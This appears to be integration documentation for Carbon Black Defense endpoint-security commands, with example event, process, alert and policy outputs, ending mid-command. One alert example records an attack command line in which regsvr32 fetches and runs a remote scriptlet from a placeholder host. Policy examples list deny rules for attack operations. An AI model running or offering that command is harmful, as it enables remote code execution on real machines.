CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation Agent location path
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName Device host name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId Device ID
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName Group name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion Device version
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType Target priority type
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress Device IP address
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude Latitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City City
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode Country code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode DMA code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude Longitude
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode Metro code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode Postal code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region Region
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode Area code
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName Country name
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName Device name
CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime Time of creation
CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime Event time
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName Full user name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name Name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine Parent command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName Parent name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid Parent PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId Process ID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine Command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart Milliseconds since process start
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine Target command line
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid Target PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName User name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid Parent private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid Private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName Target name
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid Target private PID
CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators Threat indicators

Command Example

!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"

Context Example
{
    "CarbonBlackDefense": {
        "FindEvent": {
            "EventInfo": {
                "ShortDescription": "The application \"cloud-drive-ui\" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).",
                "LongDescription": "The application \"/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui\" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.",
                "EventTime": 1533649991975,
                "CreateTime": 1533650036964,
                "DeviceDetails": {
                    "DeviceName": "cberninger-mac2",
                    "DeviceVersion": "MAC OS X 10.10.5",
                    "TargetPriorityCode": 1,
                    "DeviceHostName": null,
                    "GroupName": null,
                    "DeviceLocation": {
                        "CountryName": "United States",
                        "CountryCode": "US",
                        "DmaCode": 0,
                        "MetroCode": 0,
                        "City": null,
                        "Latitude": 37.751007,
                        "Longitude": -97.822,
                        "Region": null,
                        "PostalCode": null,
                        "AreaCode": 0
                    },
                    "TargetPriorityType": "MEDIUM",
                    "DeviceType": "MAC",
                    "DeviceId": 844355,
                    "DeviceIpAddress": "67.143.208.113",
                    "DeviceIpV4Address": "67.143.208.113",
                    "AgentLocation": "OFFSITE",
                    "Email": "cberninger"
                },
                "ProcessDetails": {
                    "ParentPid": null,
                    "FullUserName": "cberninger",
                    "PrivatePid": "1071-1533502548722-245",
                    "ProcessId": 1071,
                    "Name": "cloud-drive-ui",
                    "TargetCommandLine": null,
                    "ParentPrivatePid": null,
                    "MilisSinceProcessStart": 147443253,
                    "ParentName": null,
                    "ParentCommandLine": null,
                    "UserName": "cberninger",
                    "TargetPrivatePid": null,
                    "TargetPid": null,
                    "TargetName": null,
                    "CommandLine": null
                },
                "EventType": "NETWORK",
                "EventId": "4ad25ae99a4911e88515b3c49ffeda59",
                "ParentHash": {
                    "ApplicationName": null,
                    "Sha256Hash": null
                },
                "ProcessHash": {
                    "ApplicationName": null,
                    "ApplicationPath": null,
                    "Md5Hash": null,
                    "ReputationProperty": null,
                    "Sha256Hash": null
                },
                "ThreatIndicators": [
                    "UNKNOWN_APP",
                    "NETWORK_FLOW"
                ],
                "OrgDetails": {
                    "OrganizationId": null,
                    "OrganizationName": null,
                    "OrganizationType": null
                },
                "TargetHash": {
                    "ApplicationName": null,
                    "ReputationProperty": null,
                    "Sha256Hash": null
                }
            }
        }
    }
}
Human Readable Output
CreateTime 1533650036964
DeviceDetails AgentLocation OFFSITE
DeviceDetails DeviceHostName
DeviceDetails DeviceId 844355
DeviceDetails DeviceIpAddress 67.143.208.113
DeviceDetails DeviceIpV4Address 67.143.208.113
DeviceDetails DeviceLocation AreaCode 0
DeviceDetails DeviceLocation City
DeviceDetails DeviceLocation CountryCode US
DeviceDetails DeviceLocation CountryName United States
DeviceDetails DeviceLocation DmaCode 0
DeviceDetails DeviceLocation Latitude 37.751007
DeviceDetails DeviceLocation Longitude -97.822
DeviceDetails DeviceLocation MetroCode 0
DeviceDetails DeviceLocation PostalCode
DeviceDetails DeviceLocation Region
DeviceDetails DeviceName cberninger-mac2
DeviceDetails DeviceType MAC
DeviceDetails DeviceVersion MAC OS X 10.10.5
DeviceDetails Email cberninger

Get multiple processes


Returns the details of multiple processes, as specified by further input.

Base Command

cbd-find-processes

Input
Parameter | Description | More Information
hostNameExact | Exact host name | Case sensitive
ownerName | Owner name | Case insensitive
ownerNameExact | Exact owner name | Case sensitive
ipAddress | External or internal IP address | -
searchWindow | Events generated within this time frame | Default is one day. Events might not be available after 30 days due to retention policies.
start | Shows results from this row onward | -
rows | Maximum number of result rows | This parameter can be limited on the Cb Defense server side

Context Output
Path Description
CarbonBlackDefense.GetProcesses.ApplicationName Application name
CarbonBlackDefense.GetProcesses.ProcessId Process ID
CarbonBlackDefense.GetProcesses.NumEvents Number of events
CarbonBlackDefense.GetProcesses.ApplicationPath Application path
CarbonBlackDefense.GetProcesses.PrivatePid Private PID
CarbonBlackDefense.GetProcesses.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetProcesses.TotalResults Total results

Command Example

!cbd-find-processes ipAddress="67.143.208.113" rows=2

Context Example
{
    "CarbonBlackDefense": {
        "GetProcesses": [
            {
                "ApplicationName": "Google Chrome",
                "ApplicationPath": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
                "NumEvents": 3580,
                "PrivatePid": "81577-1533502547808-202",
                "ProcessId": 81577,
                "Sha256Hash": "19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d"
            },
            {
                "ApplicationName": "cloud-drive-ui",
                "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
                "NumEvents": 2038,
                "PrivatePid": "1071-1533502548722-245",
                "ProcessId": 1071,
                "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b"
            },
            {
                "TotalResults": 2
            }
        ]
    }
}
Human Readable Output
ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash
Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b

Get alert details


Returns the details of a specified alert.

Base Command

cbd-get-alert-details

Input
Parameter | Description
alertId | Alert ID

Context Output
Path Description
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group Group
CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId Group ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime Registered time
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName Device name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status Status
CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion OS version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName User name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance Importance
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message Message
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success Success
CarbonBlackDefense.GetAlertDetails.Events.ParentHash Parent hash
CarbonBlackDefense.GetAlertDetails.Events.PolicyState Policy state
CarbonBlackDefense.GetAlertDetails.Events.LongDescription Long description
CarbonBlackDefense.GetAlertDetails.Events.ParentPid Parent PID
CarbonBlackDefense.GetAlertDetails.Events.ProcessId Process ID
CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators Threat indicators
CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath Application path
CarbonBlackDefense.GetAlertDetails.Events.ProcessHash Process hash
CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash Process MD5 hash
CarbonBlackDefense.GetAlertDetails.Events.EventId Event ID
CarbonBlackDefense.GetAlertDetails.Events.EventTime Event time
CarbonBlackDefense.GetAlertDetails.Events.EventType Event type
CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus Kill chain status
CarbonBlackDefense.GetAlertDetails.Events.ParentName Parent name
CarbonBlackDefense.GetAlertDetails.Events.ParentPPid Parent PPID
CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid Process PPID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId Incident ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName Indicator name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary Summary
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId Threat ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore Threat score
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time Time

Command Example

!cbd-get-alert-details alertId=HWOXYQ6P

Context Example
Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe

Get all policy details


Returns the details of all policies.

Base Command

cbd-get-policies

Input

There is no input for this command.

Context Output
Path Description
CarbonBlackDefense.GetPolicies.Id The policy ID
CarbonBlackDefense.GetPolicies.PriorityLevel The policy's priority level
CarbonBlackDefense.GetPolicies.SystemPolicy System policy (boolean)
CarbonBlackDefense.GetPolicies.LatestRevision The policy's latest revision
CarbonBlackDefense.GetPolicies.Policy The policy object

Command Example

!cbd-get-policies

Context Example
CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true

Get the details of a specified policy


Returns the details of a specified policy.

Base Command

cbd-get-policy

Input
Parameter Description
policyId Policy ID

Context Output
Path Description
CarbonBlackDefense.GetPolicy.Id The policy ID
CarbonBlackDefense.GetPolicy.PriorityLevel The policy's priority level
CarbonBlackDefense.GetPolicy.SystemPolicy System policy (boolean)
CarbonBlackDefense.GetPolicy.LatestRevision The policy's latest revision
CarbonBlackDefense.GetPolicy.Policy The policy object

Command Example

!cbd-get-policy policyId=6525

Context Example
CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Human Readable Output
Id 6525
LatestRevision 1488926710902
Policy {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]}
PriorityLevel MEDIUM
SystemPolicy true

Create a policy


Creates a policy, as prescribed by further input.

Base Command

cbd-create-policy

Input
Parameter Description
description Policy description
name A single-line name for the policy
priorityLevel Priority score associated with sensors assigned to this policy
policy

JSON object containing the policy details.

Make sure a valid policy object is passed:

  1. Use the cbd-get-policy command to retrieve a similar policy object.
  2. Use the cbd-set-policy command to change the policy fields you need.
  3. Pass the modified object as this parameter.

Context Output
Path Description
CarbonBlackDefense.CreatePolicy.PolicyId The new policy ID

Command Example

!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }

Context Example
CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356
Human Readable Output
PolicyId 21356

Update a policy


Updates an existing policy.

Base Command

cbd-update-policy

Input
Parameter Description
description Policy description
name A single-line name for the policy
priorityLevel Priority score associated with sensors assigned to this policy.
id

The ID of the policy to update.

policy

JSON object containing the policy details.

Make sure a valid policy object is passed:

  1. Use the cbd-get-policy command to retrieve a similar policy object.
  2. Use the cbd-set-policy command to change the policy fields you need.
  3. Pass the modified object as this parameter.

Context Output

There is no context output for this command.

Command Example

!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http:/